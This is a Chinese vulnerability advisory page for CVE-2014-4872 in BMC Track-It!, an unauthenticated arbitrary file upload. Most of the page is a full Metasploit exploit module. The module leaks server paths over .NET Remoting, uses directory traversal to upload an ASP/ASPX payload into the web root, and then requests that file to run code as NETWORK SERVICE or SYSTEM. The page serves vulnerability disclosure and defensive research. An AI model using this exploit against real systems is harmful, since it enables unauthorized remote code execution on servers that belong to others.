首页 -> 安全研究
安全研究
安全漏洞
Numara/BMC Track-It! FileStorageService任意文件上传漏洞
发布日期:2014-10-21
更新日期:2014-10-22
受影响系统:
BMC Track-It! 11.3.0.355描述:
CVE(CAN) ID: CVE-2014-4872
BMC Track-It!是集成的IT帮助桌面和资产管理解决方案。
BMC Track-It! 11.3.0.355版本没有对TCP端口9010进行身份验证,远程攻击者通过向FileStorageService或ConfigurationService发送.NET Remoting请求,利用此漏洞可上传任意文件、执行任意代码、获取敏感凭证和配置信息。
<*来源:Pedro Ribeiro
链接:http://www.kb.cert.org/vuls/id/121036
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Numara / BMC Track-It! FileStorageService Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!
v8 to v11.X.
The application exposes the FileStorageService .NET remoting service on port 9010
(9004 for version 8) which accepts unauthenticated uploads. This can be abused by
a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary
code execution as NETWORK SERVICE or SYSTEM.
This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
10.0.0.143, 9.0.30.248 and 8.0.2.51.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-4872' ],
[ 'OSVDB', '112741' ],
[ 'US-CERT-VU', '121036' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Oct/34' ],
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt' ]
],
'DefaultOptions' => { 'WfsDelay' => 30 },
'Platform' => 'win',
'Arch' => ARCH_X86,
'Targets' =>
[
[ 'Numara / BMC Track-It! v9 to v11.X - Windows', {} ],
],
'Privileged' => false,
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 7 2014'
))
register_options(
[
OptPort.new('RPORT',
[true, 'TrackItWeb application port', 80]),
OptPort.new('RPORT_REMOTING',
[true, '.NET remoting service port', 9010]),
OptInt.new('SLEEP',
[true, 'Seconds to sleep while we wait for ASP(X) file to be written', 15]),
OptString.new('TARGETURI',
[true, 'Base path to the TrackItWeb application', '/TrackItWeb/'])
], self.class)
end
def get_version
res = send_request_cgi!({
'uri' => normalize_uri(datastore['TARGETURI']),
'method' => 'GET'
})
if res and res.code == 200 and res.body.to_s =~ /\/TrackItWeb\/Content\.([0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,4})\//
version = $1.split(".")
return version
end
end
def check
version = get_version
if version != nil
if (version[0].to_i < 11) or
(version[0].to_i == 11 and version[1].to_i <= 3) or
(version[0].to_i == 11 and version[1].to_i == 3 and version[2].to_i == 0 and version[3].to_i < 999)
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
if not sock.nil?
sock.write(rand_text_alpha(rand(200) + 100))
res = sock.recv(1024)
if res =~ /Tcp channel protocol violation: expecting preamble/
return Exploit::CheckCode::Appears
end
sock.close
end
else
return Exploit::CheckCode::Safe
end
end
return Exploit::CheckCode::Unknown
end
def longest_common_substr(strings)
shortest = strings.min_by &:length
maxlen = shortest.length
maxlen.downto(0) do |len|
0.upto(maxlen - len) do |start|
substr = shortest[start,len]
return substr if strings.all?{|str| str.include? substr }
end
end
end
def get_traversal_path
#
# ConfigurationService packet structure:
#
# @packet_header_pre_packet_size
# packet_size (4 bytes)
# @packet_header_pre_uri_size
# uri_size (2 bytes)
# @packet_header_pre_uri
# uri
# @packet_header_post_uri
# packet_body_start_pre_method_size
# method_size (1 byte)
# method
# @packet_body_pre_type_size
# type_size (1 byte)
# @packet_body_pre_type
# type
# @packet_terminator
#
# .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx
#
packet_body_start_pre_method_size = [
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x15, 0x11, 0x00, 0x00, 0x00, 0x12
]
service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
method = "GetProductDeploymentValues".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
file_storage_dir_str = "FileStorageDataDirectory"
web_data_dir_str = "WebDataCacheDirectory"
packet_size =
@packet_header_pre_uri_size.length +
2 + # uri_size
@packet_header_pre_uri.length +
uri.length +
@packet_header_post_uri.length +
packet_body_start_pre_method_size.length +
1 + # method_size
method.length +
@packet_body_pre_type_size.length +
1 + # type_size
@packet_body_pre_type.length +
type.length
# start of packet and packet size (4 bytes)
buf = @packet_header_pre_packet_size.pack('C*')
buf << Array(packet_size).pack('L*')
# uri size (2 bytes)
buf << @packet_header_pre_uri_size.pack('C*')
buf << Array(uri.length).pack('S*')
# uri
buf << @packet_header_pre_uri.pack('C*')
buf << uri.bytes.to_a.pack('C*')
buf << @packet_header_post_uri.pack('C*')
# method name
buf << packet_body_start_pre_method_size.pack('C*')
buf << Array(method.length).pack('C*')
buf << method.bytes.to_a.pack('C*')
# type name
buf << @packet_body_pre_type_size.pack('C*')
buf << Array(type.length).pack('C*')
buf << @packet_body_pre_type.pack('C*')
buf << type.bytes.to_a.pack('C*')
buf << @packet_terminator.pack('C*')
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
if sock.nil?
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
else
print_status("#{rhost}:#{@remoting_port} - Getting traversal path...")
end
sock.write(buf)
# read from the socket for up to (SLEEP / 2) seconds
counter = 0
web_data_dir = nil
file_storage_dir = nil
while counter < datastore['SLEEP']
begin
readable,writable,error = IO.select([sock], nil, nil, datastore['SLEEP'] / 2)
if readable == nil
break
else
sock = readable[0]
end
buf_reply = sock.readpartial(4096)
if (index = (buf_reply.index(file_storage_dir_str))) != nil
# after file_storage_dir_str, discard 5 bytes then get file_storage_dir_size
size = buf_reply[index + file_storage_dir_str.length + 5,1].unpack('C*')[0]
file_storage_dir = buf_reply[index + file_storage_dir_str.length + 6, size]
if file_storage_dir != nil and web_data_dir != nil
break
end
end
if (index = (buf_reply.index(web_data_dir_str))) != nil
# after web_data_dir_str, discard 5 bytes then get web_data_dir_size
size = buf_reply[index + web_data_dir_str.length + 5,1].unpack('C*')[0]
web_data_dir = buf_reply[index + web_data_dir_str.length + 6, size]
if file_storage_dir != nil and web_data_dir != nil
break
end
end
counter += 1
sleep(0.5)
rescue SystemCallError
break
end
end
sock.close
if file_storage_dir != nil and web_data_dir != nil
# Now we need to adjust the paths before we calculate the traversal_size
# On the web_data_dir, trim the last part (the Cache directory) and add the Web\Installers part
# which is the path accessible without authentication.
# On the file_storage_dir, add the IncidentRepository part where the files land by default.
# We then find the common string and calculate the traversal_path.
web_data_dir = web_data_dir[0,web_data_dir.rindex("\\")] + "\\Web\\Installers\\"
file_storage_dir << "\\Repositories\\IncidentRepository"
common_str = longest_common_substr([file_storage_dir, web_data_dir])
traversal_size = file_storage_dir[common_str.rindex("\\"), file_storage_dir.length].scan("\\").length
traversal_path = "..\\" * traversal_size + web_data_dir[common_str.rindex("\\") + 1,common_str.length]
return traversal_path
else
return nil
end
# Note: version 8 always returns nil as the GetProductDeploymentValues does not exist
end
def send_file(traversal_path, filename, file_content)
#
# FileStorageService packet structure:
#
# @packet_header_pre_packet_size
# packet_size (4 bytes)
# @packet_header_pre_uri_size
# uri_size (2 bytes)
# @packet_header_pre_uri
# uri
# @packet_header_post_uri
# packet_body_start_pre_method_size
# method_size (1 byte)
# method
# @packet_body_pre_type_size
# type_size (1 byte)
# @packet_body_pre_type
# type
# packet_body_pre_repository_size
# repository_size (1 byte)
# repository
# packet_body_pre_filepath_size
# filepath_size (1 byte)
# filepath
# packet_body_pre_binary_lib_size
# binary_lib_size (1 byte)
# binary_lib
# packet_body_pre_file_content_decl_size
# file_content_decl_size (1 byte)
# file_content_decl
# packet_body_pre_filesize
# file_size (4 bytes)
# packet_body_pre_filecontent
# file_content
# @packet_terminator
#
# .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx
#
packet_body_start_pre_method_size = [
0x00, 0x01, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff,
0xff, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x15, 0x14, 0x00, 0x00, 0x00, 0x12
]
packet_body_pre_repository_size = [
0x10, 0x01, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00,
0x00, 0x0a, 0x09, 0x02, 0x00, 0x00, 0x00, 0x06,
0x03, 0x00, 0x00, 0x00
]
packet_body_pre_filepath_size = [
0x06, 0x04, 0x00, 0x00, 0x00
]
packet_body_pre_binary_lib_size = [
0x0c, 0x05, 0x00, 0x00, 0x00
]
packet_body_pre_file_content_decl_size = [
0x05, 0x02, 0x00, 0x00, 0x00
]
packet_body_pre_file_size = [
0x01, 0x00, 0x00, 0x00, 0x09, 0x5f, 0x72, 0x61,
0x77, 0x42, 0x79, 0x74, 0x65, 0x73, 0x07, 0x02,
0x05, 0x00, 0x00, 0x00, 0x09, 0x06, 0x00, 0x00,
0x00, 0x0f, 0x06, 0x00, 0x00, 0x00
]
packet_body_pre_filecontent = [ 0x02 ]
service = "TrackIt.Core.FileStorageService".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
method = "Create"
type = "TrackIt.Core.FileStorage.IFileStorageSecureDelegator, TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
repository = "IncidentRepository"
binary_lib = "TrackIt.Core.FileStorage, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
file_content_decl = "TrackIt.Core.FileStorage.FileContent".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
filepath = traversal_path + filename
packet_size =
@packet_header_pre_uri_size.length +
2 + # uri_size
@packet_header_pre_uri.length +
uri.length +
@packet_header_post_uri.length +
packet_body_start_pre_method_size.length +
1 + # method_size
method.length +
@packet_body_pre_type_size.length +
1 + # type_size
@packet_body_pre_type.length +
type.length +
packet_body_pre_repository_size.length +
1 + # repository_size
repository.length +
packet_body_pre_filepath_size.length +
1 + # filepath_size
filepath.length +
packet_body_pre_binary_lib_size.length +
1 + # binary_lib_size
binary_lib.length +
packet_body_pre_file_content_decl_size.length +
1 + # file_content_decl_size
file_content_decl.length +
packet_body_pre_file_size.length +
4 + # file_size
packet_body_pre_filecontent.length +
file_content.length
# start of packet and packet size (4 bytes)
buf = @packet_header_pre_packet_size.pack('C*')
buf << Array(packet_size).pack('L*')
# uri size (2 bytes)
buf << @packet_header_pre_uri_size.pack('C*')
buf << Array(uri.length).pack('S*')
# uri
buf << @packet_header_pre_uri.pack('C*')
buf << uri.bytes.to_a.pack('C*')
buf << @packet_header_post_uri.pack('C*')
# method name
buf << packet_body_start_pre_method_size.pack('C*')
buf << Array(method.length).pack('C*')
buf << method.bytes.to_a.pack('C*')
# type name
buf << @packet_body_pre_type_size.pack('C*')
buf << Array(type.length).pack('C*')
buf << @packet_body_pre_type.pack('C*')
buf << type.bytes.to_a.pack('C*')
# repository name
buf << packet_body_pre_repository_size.pack('C*')
buf << Array(repository.length).pack('C*')
buf << repository.bytes.to_a.pack('C*')
# filepath
buf << packet_body_pre_filepath_size.pack('C*')
buf << Array(filepath.length).pack('C*')
buf << filepath.bytes.to_a.pack('C*')
# binary lib name
buf << packet_body_pre_binary_lib_size.pack('C*')
buf << Array(binary_lib.length).pack('C*')
buf << binary_lib.bytes.to_a.pack('C*')
# file content decl
buf << packet_body_pre_file_content_decl_size.pack('C*')
buf << Array(file_content_decl.length).pack('C*')
buf << file_content_decl.bytes.to_a.pack('C*')
# file size (4 bytes)
buf << packet_body_pre_file_size.pack('C*')
buf << Array(file_content.length).pack('L*')
# file contents
buf << packet_body_pre_filecontent.pack('C*')
buf << file_content
buf << @packet_terminator.pack('C*')
# send the packet and ignore the response
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
if sock.nil?
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
else
print_status("#{rhost}:#{@remoting_port} - Uploading payload to #{filename}")
end
sock.write(buf)
sock.close
# We can't really register our files for cleanup as most of the time we run under the IIS user, not SYSTEM
end
def exploit
@packet_header_pre_packet_size= [
0x2e, 0x4e, 0x45, 0x54, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00
]
@packet_header_pre_uri_size = [
0x04, 0x00, 0x01, 0x01
]
@packet_header_pre_uri = [
0x00, 0x00
]
# contains binary type (application/octet-stream)
@packet_header_post_uri = [
0x06, 0x00, 0x01, 0x01, 0x18, 0x00, 0x00, 0x00,
0x61, 0x70, 0x70, 0x6c, 0x69, 0x63, 0x61, 0x74,
0x69, 0x6f, 0x6e, 0x2f, 0x6f, 0x63, 0x74, 0x65,
0x74, 0x2d, 0x73, 0x74, 0x72, 0x65, 0x61, 0x6d,
0x00, 0x00
]
@packet_body_pre_type_size = [ 0x12 ]
@packet_body_pre_type = [ 0x01 ]
@packet_terminator = [ 0x0b ]
version = get_version
if version != nil
@version = version[0].to_i
else
# We assume it's version 9 or below because we couldn't find any version identifiers
@version = 9
end
@remoting_port = datastore['RPORT_REMOTING']
traversal_path = get_traversal_path
if traversal_path == nil
print_error("#{rhost}:#{@remoting_port} - Could not get traversal path, falling back to defaults")
case @version
when 9
traversal_path = "..\\..\\..\\..\\Web Add-On\\Web\\Installers\\"
when 10
traversal_path = "..\\..\\..\\..\\..\\Numara Track-It! Web\\Web\\Installers\\"
when 11
traversal_path = "..\\..\\..\\..\\..\\Track-It! Web\\Web\\Installers\\"
end
end
# generate our payload
exe = generate_payload_exe
if @version == 9
file_content = Msf::Util::EXE.to_exe_asp(exe)
filename = rand_text_alpha_lower(rand(6) + 6) + ".asp"
else
file_content = Msf::Util::EXE.to_exe_aspx(exe)
filename = rand_text_alpha_lower(rand(6) + 6) + ".aspx"
end
send_file(traversal_path, filename, file_content)
# sleep a few seconds, sometimes the service takes a while to write to disk
sleep(datastore['SLEEP'])
print_status("#{peer} - Executing payload")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
'method' => 'GET'
})
if res
if res.code == 500
print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX"))
# try again but now use ASPX instead of ASP or vice-versa
if @version == 9
file_content = Msf::Util::EXE.to_exe_aspx(exe)
filename = rand_text_alpha_lower(rand(6) + 6) + ".aspx"
else
file_content = Msf::Util::EXE.to_exe_asp(exe)
filename = rand_text_alpha_lower(rand(6) + 6) + ".asp"
end
send_file(traversal_path, filename, file_content)
# sleep a few seconds, sometimes the service takes a while to write to disk
sleep(datastore['SLEEP'])
print_status("#{peer} - Executing payload")
res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename),
'method' => 'GET'
})
end
end
if not res or res.code != 200
fail_with(Exploit::Failure::Unknown, "#{peer} - Could not execute payload" + (res ? ", got HTTP code #{res.code.to_s}": ""))
end
handler
end
end
建议:
厂商补丁:
BMC
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bmc.com/it-solutions/brands/numara-software.html
浏览次数:2561
严重程度:0(网友投票)
绿盟科技给您安全的保障